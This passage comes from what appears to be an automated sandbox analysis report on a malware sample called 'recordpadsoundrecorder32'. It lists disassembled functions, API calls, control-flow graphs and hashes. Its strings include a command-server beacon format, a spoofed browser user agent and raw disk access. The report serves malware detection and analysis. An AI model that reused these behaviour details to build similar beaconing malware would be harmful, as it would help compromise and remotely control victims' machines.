                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                      • API String ID: 3786717961-1180397377
                                                                                      • Opcode ID: 17c0ac5f84ec47e831fe8554c1477fc74aa8f44433f2a3d3825f5947da5b3476
                                                                                      • Instruction ID: d5063f03daca64425f8dbf5a1d91700505b5d6fffa4e0c42bc4e442316cf17e2
                                                                                      • Opcode Fuzzy Hash: 17c0ac5f84ec47e831fe8554c1477fc74aa8f44433f2a3d3825f5947da5b3476
                                                                                      • Instruction Fuzzy Hash: 13319071E00219EBDB38CFA4C884EEFBBB9FF05714F24416AE515A7680DB705A05EB94
                                                                                      Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1017 401a4f-401a77 CreateFileA 1018 401b45-401b4a 1017->1018 1019 401a7d-401a91 1017->1019 1020 401a98-401ac0 DeviceIoControl 1019->1020 1021 401ac2-401aca 1020->1021 1022 401af3-401afb 1020->1022 1025 401ad4-401ad9 1021->1025 1026 401acc-401ad2 1021->1026 1023 401b04-401b07 1022->1023 1024 401afd-401b03 call 402ce6 1022->1024 1029 401b09-401b0c 1023->1029 1030 401b3a-401b44 FindCloseChangeNotification 1023->1030 1024->1023 1025->1022 1027 401adb-401af1 call 402d00 call 4018cc 1025->1027 1026->1022 1027->1022 1033 401b27-401b34 call 402cd8 1029->1033 1034 401b0e-401b17 GetLastError 1029->1034 1030->1018 1033->1020 1033->1030 1034->1030 1036 401b19-401b1c 1034->1036 1036->1033 1040 401b1e-401b24 1036->1040 1040->1033
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                      • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                      • GetLastError.KERNEL32 ref: 00401B0E
                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                      • API String ID: 3786717961-1180397377
                                                                                      • Opcode ID: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction ID: 04828827cee311aa1ccd055820d70034eb57b3ddca3c9d8c28a7d5788a1782d0
                                                                                      • Opcode Fuzzy Hash: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction Fuzzy Hash: 43318D71D00118EADB21AFA5CD849EFBBB9FF41750F20407AE554B22A0E7785E45CB98
                                                                                      Function 02606443 Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 245memorylibraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 213 2606443-260646d 214 260649f-26066ed RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 26042c7 GetTickCount call 260605a GetVersionExA call 2614aa0 call 2612f5c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2614aa0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2612f5c * 4 QueryPerformanceCounter Sleep call 2612f5c * 2 call 2614aa0 * 2 213->214 215 260646f-2606486 213->215 260 26066f0-26066f2 214->260 261 26066f4-26066f9 260->261 262 26066fb-26066fd 260->262 265 2606704 Sleep 261->265 263 260670a-260673e RtlEnterCriticalSection RtlLeaveCriticalSection 262->263 264 26066ff 262->264 266 2606740-260674c 263->266 267 260678e 263->267 264->265 265->263 266->267 269 260674e-260675b 266->269 268 2606792-26072bf InternetOpenA 267->268 274 2607385-260738b 268->274 275 26072c5-260733c InternetSetOptionA * 3 call 2614aa0 InternetOpenUrlA 268->275 271 2606763-2606764 269->271 272 260675d-2606761 269->272 273 2606768-260678c call 2614aa0 * 2 271->273 272->273 273->268 278 26073a7-26073b5 274->278 279 260738d-2607393 274->279 288 260737e-260737f InternetCloseHandle 275->288 289 260733e 275->289 278->260 283 26073bb-26073df call 2614aa0 call 260439c 278->283 280 2607395-2607397 279->280 281 2607399-26073a6 call 26053ec 279->281 280->278 281->278 283->260 298 26073e5-2607413 RtlEnterCriticalSection RtlLeaveCriticalSection call 26122ec 283->298 288->274 293 2607342-2607368 InternetReadFile 289->293 295 2607373-260737a InternetCloseHandle 293->295 296 260736a-2607371 293->296 295->288 296->293 301 2607415-2607427 call 26122ec 298->301 302 2607469-2607484 call 26122ec 298->302 301->302 307 2607429-260743b call 26122ec 301->307 308 260748a-260748c 302->308 309 260773e-2607750 call 26122ec 302->309 307->302 316 260743d-260744f call 26122ec 307->316 308->309 311 2607492-2607544 call 2612f5c RtlEnterCriticalSection RtlLeaveCriticalSection call 2614aa0 * 5 call 260439c * 2 308->311 318 2607752-2607754 309->318 319 2607799-26077ab call 26122ec 309->319 375 2607581 311->375 376 2607546-2607548 311->376 316->302 330 2607451-2607463 call 26122ec 316->330 318->319 321 2607756-2607794 call 2614aa0 RtlEnterCriticalSection RtlLeaveCriticalSection 318->321 331 26077cc-26077de call 26122ec 319->331 332 26077ad-26077c7 call 26061f1 call 26062ff call 260640a 319->332 321->260 330->260 330->302 341 26077e4-26077e6 331->341 342 2607afc-2607b0e call 26122ec 331->342 332->260 341->342 345 26077ec-2607803 call 260439c 341->345 342->260 356 2607b14-2607b42 call 2612f5c call 2614aa0 call 260439c 342->356 345->260 357 2607809-26078d7 call 26123c8 call 2601ba7 345->357 377 2607b44-2607b46 call 260534d 356->377 378 2607b4b-2607b52 call 2612f24 356->378 373 26078d9 call 260143f 357->373 374 26078de-26078ff RtlEnterCriticalSection 357->374 373->374 381 2607901-2607908 374->381 382 260790b-260796f RtlLeaveCriticalSection call 2603c67 call 2603d7e call 26082e9 374->382 379 2607585-26075b3 call 2612f5c call 2614aa0 call 260439c 375->379 376->375 383 260754a-260755c call 26122ec 376->383 377->378 378->260 406 26075f4-26075fd call 2612f24 379->406 407 26075b5-26075c4 call 2613596 379->407 381->382 404 2607ae3-2607af7 call 2608fb1 382->404 405 2607975-26079bd call 260a6d3 382->405 383->375 394 260755e-260757f call 260439c 383->394 394->379 404->260 417 26079c3-26079ca 405->417 418 2607aad-2607ade call 2608398 call 26033b2 405->418 419 2607603-260761b call 2613afc 406->419 420 2607734-2607737 406->420 407->406 416 26075c6 407->416 421 26075cb-26075dd call 2612800 416->421 423 26079cd-26079d2 417->423 418->404 432 2607627 419->432 433 260761d-2607625 call 26096e5 419->433 420->309 435 26075e2-26075f2 call 2613596 421->435 436 26075df 421->436 423->423 427 26079d4-2607a1f call 260a6d3 423->427 427->418 442 2607a25-2607a2b 427->442 434 2607629-26076e1 call 260a7fd call 2603863 call 2605119 call 2603863 call 260aaa3 call 260abbd 432->434 433->434 462 26076e3 call 260380b 434->462 463 26076e8-2607713 Sleep call 26118a0 434->463 435->406 435->421 436->435 445 2607a2e-2607a33 442->445 445->445 447 2607a35-2607a70 call 260a6d3 445->447 447->418 452 2607a72-2607aac call 260d0c5 447->452 452->418 462->463 467 2607715-260771e call 2604100 463->467 468 260771f-260772d 463->468 467->468 468->420 470 260772f call 260380b 468->470 470->420
                                                                                      APIs
                                                                                      • RtlInitializeCriticalSection.NTDLL(026371D8), ref: 026064B6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 026064CD
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064D6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 026064E5
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064E8
                                                                                      • GetTickCount.KERNEL32 ref: 026064F4
                                                                                      • GetVersionExA.KERNEL32(02637030), ref: 02606521
                                                                                      • _memset.LIBCMT ref: 02606540
                                                                                      • _malloc.LIBCMT ref: 0260654D
                                                                                      • _malloc.LIBCMT ref: 0260655D
                                                                                      • _malloc.LIBCMT ref: 02606568
                                                                                      • _malloc.LIBCMT ref: 02606573
                                                                                      • _malloc.LIBCMT ref: 0260657E
                                                                                      • _malloc.LIBCMT ref: 02606589
                                                                                      • _malloc.LIBCMT ref: 02606594
                                                                                      • _malloc.LIBCMT ref: 026065A3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 026065BA
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065C3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065D2
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065D5
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065E0
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065E3
                                                                                      • _memset.LIBCMT ref: 026065F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc_memset$CountCriticalInitializeSectionTickVersion
                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                      • API String ID: 3095297975-2678694477
                                                                                      • Opcode ID: 08ddbbb69802ae71d61b5e4d421425eba9532c9813c374077112ef593a3578fe
                                                                                      • Instruction ID: d6b4326f067e15b6fcadb7f88ec81dea4af99c84ff2141c737d6a62cce1711ff
                                                                                      • Opcode Fuzzy Hash: 08ddbbb69802ae71d61b5e4d421425eba9532c9813c374077112ef593a3578fe
                                                                                      • Instruction Fuzzy Hash: 728138B1D883509FE3216F309C44B5FBBE9AF85310F15482EF98997281DBB45849CF9A
                                                                                      Function 02601CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02601D11
                                                                                      • GetLastError.KERNEL32 ref: 02601D23
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02601D59
                                                                                      • GetLastError.KERNEL32 ref: 02601D6B
                                                                                      • __beginthreadex.LIBCMT ref: 02601DB1
                                                                                      • GetLastError.KERNEL32 ref: 02601DC6
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02601DDD
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02601DEC
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02601E14
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02601E1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                                      • String ID: thread$thread.entry_event$thread.exit_event
                                                                                      • API String ID: 4246062733-3017686385
                                                                                      • Opcode ID: e4d7e4b6d8056d9a6386dea2d1e3b8d3074ab3d5632cf07c5287384d6cebcf04
                                                                                      • Instruction ID: 30b6eef9b52e64e42e9d66a0e2ab75ea53d4ee571e6dbf6918ac685d793a2810
                                                                                      • Opcode Fuzzy Hash: e4d7e4b6d8056d9a6386dea2d1e3b8d3074ab3d5632cf07c5287384d6cebcf04
                                                                                      • Instruction Fuzzy Hash: 65318871A007019FD711EF24C888A2FBBA5EF85710F1549ADF9498B2D1DB70A9898F92
                                                                                      Function 02604D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604D8B
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 02604DB7
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02604DC3
                                                                                        • Part of subcall function 02604BED: __EH_prolog.LIBCMT ref: 02604BF2
                                                                                        • Part of subcall function 02604BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02604CF2
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 02604E93
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02604E99
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 02604EA0
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02604EA6
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026050A7
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026050AD
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026050B8
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026050C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                      • String ID:
                                                                                      • API String ID: 2062355503-0
                                                                                      • Opcode ID: 15d773749502c66c78498a6d9966f0bba461b182dd1edc4af5347800ac7adc75
                                                                                      • Instruction ID: c5aa9d2d3ca969325db5df219b0251204793edede502d672a2f8ff122fb8d1a0
                                                                                      • Opcode Fuzzy Hash: 15d773749502c66c78498a6d9966f0bba461b182dd1edc4af5347800ac7adc75
                                                                                      • Instruction Fuzzy Hash: 0AB14B71D0025DDEDF29DFA0C880BEEBBB5AF04304F14409AE90976280DBB55A49DFA5
                                                                                      Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 858 401f64-401f84 FindResourceA 859 401f86-401f9d GetLastError SizeofResource 858->859 860 401f9f-401fa1 858->860 859->860 861 401fa6-401fec LoadResource LockResource GlobalAlloc call 402940 * 2 859->861 862 402096-40209a 860->862 867 401fee-401ff9 861->867 867->867 868 401ffb-402003 GetTickCount 867->868 869 402032-402038 868->869 870 402005-402007 868->870 871 402053-402083 GlobalAlloc call 401c26 869->871 873 40203a-40204a 869->873 870->871 872 402009-40200f 870->872 878 402088-402093 871->878 872->871 875 402011-402023 872->875 876 40204c 873->876 877 40204e-402051 873->877 879 402025 875->879 880 402027-40202a 875->880 876->877 877->871 877->873 878->862 879->880 880->875 881 40202c-40202e 880->881 881->872 882 402030 881->882 882->871
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                      • GetLastError.KERNEL32 ref: 00401F86
                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                      • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                      • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                      • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                      • String ID:
                                                                                      • API String ID: 564119183-0
                                                                                      • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction ID: 6227662f3afde43d5576465443d89a1ce2d87db52467ebd9ddb435d6f9af9923
                                                                                      • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction Fuzzy Hash: 68316E31A00255AFDB105FB49F8896F7F68EF45344F10807AFE86F7291DA748845C7A8
                                                                                      Function 026026DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02602706
                                                                                      • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0260272B
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02625B03), ref: 02602738
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02602778
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 026027D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                      • String ID: timer
                                                                                      • API String ID: 4293676635-1792073242
                                                                                      • Opcode ID: aee2c1a295e32129151a29020bf255a479dcae1dde59bd4245c5e7bda9b2acd1
                                                                                      • Instruction ID: bc98475952681bd60c8e6c4a9bae7eac95abc3d4b3015d343f51bffb7316534b
                                                                                      • Opcode Fuzzy Hash: aee2c1a295e32129151a29020bf255a479dcae1dde59bd4245c5e7bda9b2acd1
                                                                                      • Instruction Fuzzy Hash: 7B318BB1804B05AFD315DF25C988B1BBBE8FF48724F004A2EF95582680D770E858CF95
                                                                                      Function 02602B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 934 2602b95-2602baf 935 2602bb1-2602bb9 call 2610ac0 934->935 936 2602bc7-2602bcb 934->936 943 2602bbf-2602bc2 935->943 938 2602bcd-2602bd0 936->938 939 2602bdf 936->939 938->939 941 2602bd2-2602bdd call 2610ac0 938->941 942 2602be2-2602c11 WSASetLastError WSARecv call 260a4b7 939->942 941->943 948 2602c16-2602c1d 942->948 946 2602d30 943->946 949 2602d32-2602d38 946->949 950 2602c2c-2602c32 948->950 951 2602c1f-2602c2a call 2610ac0 948->951 952 2602c34-2602c39 call 2610ac0 950->952 953 2602c46-2602c48 950->953 962 2602c3f-2602c42 951->962 952->962 956 2602c4a-2602c4d 953->956 957 2602c4f-2602c60 call 2610ac0 953->957 960 2602c66-2602c69 956->960 957->949 957->960 964 2602c73-2602c76 960->964 965 2602c6b-2602c6d 960->965 962->953 964->946 967 2602c7c-2602c9a call 2610ac0 call 260166f 964->967 965->964 966 2602d22-2602d2d call 2601996 965->966 966->946 974 2602cbc-2602cfa WSASetLastError select call 260a4b7 967->974 975 2602c9c-2602cba call 2610ac0 call 260166f 967->975 981 2602d08 974->981 982 2602cfc-2602d06 call 2610ac0 974->982 975->946 975->974 985 2602d15-2602d17 981->985 986 2602d0a-2602d12 call 2610ac0 981->986 987 2602d19-2602d1d 982->987 985->946 985->987 986->985 987->942
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602BE4
                                                                                      • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02602C07
                                                                                        • Part of subcall function 0260A4B7: WSAGetLastError.WS2_32(00000000,?,?,02602A51), ref: 0260A4C5
                                                                                      • WSASetLastError.WS2_32 ref: 02602CD3
                                                                                      • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02602CE7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Recvselect
                                                                                      • String ID: 3'
                                                                                      • API String ID: 886190287-280543908
                                                                                      • Opcode ID: e6b4a9b0fe7552d16beb85d41858104053d558857b9381ca6bbba373884d6449
                                                                                      • Instruction ID: 313b0c0f2af41c3e87e66ccb6bb0c0424a2311d93b67b623dddf6b054d71842e
                                                                                      • Opcode Fuzzy Hash: e6b4a9b0fe7552d16beb85d41858104053d558857b9381ca6bbba373884d6449
                                                                                      • Instruction Fuzzy Hash: EC418EB19053019FDB289F74C99876BBBE9AF85354F14091EEC99832C0EB74D884DB92
                                                                                      Function 00402EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetVersion.KERNEL32 ref: 00402F16
                                                                                        • Part of subcall function 00404034: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00404034: HeapDestroy.KERNEL32 ref: 00404084
                                                                                      • GetCommandLineA.KERNEL32 ref: 00402F64
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402F8F
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FB2
                                                                                        • Part of subcall function 0040300B: ExitProcess.KERNEL32 ref: 00403028
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                      • String ID: Y
                                                                                      • API String ID: 2057626494-4136946213
                                                                                      • Opcode ID: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction ID: 31bd938ea51fadde60a3d0ec437c396cd65a6e637b97124abe794e54387ab133
                                                                                      • Opcode Fuzzy Hash: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction Fuzzy Hash: 19216DB1800615AAD714AFA6DE49A6E7FB8EB44719F10413FF505BB2D1DB385500CA58
                                                                                      Function 00402845 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1070 402845-40d446 call 402db0 GetCommandLineW CommandLineToArgvW GetLocalTime call 401f27 1079 40d8a7 1070->1079 1080 40d44c-40dba7 1070->1080 1082 40d8aa 1079->1082 1083 40dbaa 1080->1083 1082->1082 1083->1083
                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32(?), ref: 004028F2
                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 004028F9
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvLocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 3768950922-2768313731
                                                                                      • Opcode ID: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction ID: f8a697a6ba56cfa0421d3161c88fb5920d4a750ed1aa0ba2803a0c5cf8bd7934
                                                                                      • Opcode Fuzzy Hash: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction Fuzzy Hash: 59E06D75C08202EEC7007BE0AF098AC77B4AA08301320817FE556B51D0CB7C548AAB2F
                                                                                      Function 026029EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1084 26029ee-2602a06 1085 2602ab3-2602abb call 2610ac0 1084->1085 1086 2602a0c-2602a10 1084->1086 1093 2602abe-2602ac6 1085->1093 1088 2602a12-2602a15 1086->1088 1089 2602a39-2602a4c WSASetLastError closesocket call 260a4b7 1086->1089 1088->1089 1092 2602a17-2602a36 call 2610ac0 call 2602f50 1088->1092 1094 2602a51-2602a55 1089->1094 1092->1089 1094->1085 1096 2602a57-2602a5f call 2610ac0 1094->1096 1102 2602a61-2602a67 1096->1102 1103 2602a69-2602a71 call 2610ac0 1096->1103 1102->1103 1104 2602a7b-2602aad ioctlsocket WSASetLastError closesocket call 260a4b7 1102->1104 1108 2602a73-2602a79 1103->1108 1109 2602aaf-2602ab1 1103->1109 1104->1109 1108->1104 1108->1109 1109->1085 1109->1093
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602A3B
                                                                                      • closesocket.WS2_32 ref: 02602A42
                                                                                      • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02602A89
                                                                                      • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02602A97
                                                                                      • closesocket.WS2_32 ref: 02602A9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1561005644-0
                                                                                      • Opcode ID: 30ce3cf9f49c41bdde748ea7d1bac5e98df59f2c6a38d4a817cd0ffb25e0b93a
                                                                                      • Instruction ID: d21e733f1f325fa5d734ee757be219139f772e5b5da3bb86b50ababd94f4b21e
                                                                                      • Opcode Fuzzy Hash: 30ce3cf9f49c41bdde748ea7d1bac5e98df59f2c6a38d4a817cd0ffb25e0b93a
                                                                                      • Instruction Fuzzy Hash: 3D212471A00205ABEB299BB88988B6FB2E9AF44315F19496DEC05C32C1EF70D9808B50
                                                                                      Function 02601BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02601BAC
                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02601BBC
                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02601BEA
                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02601C13
                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02601C56
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 1633115879-0
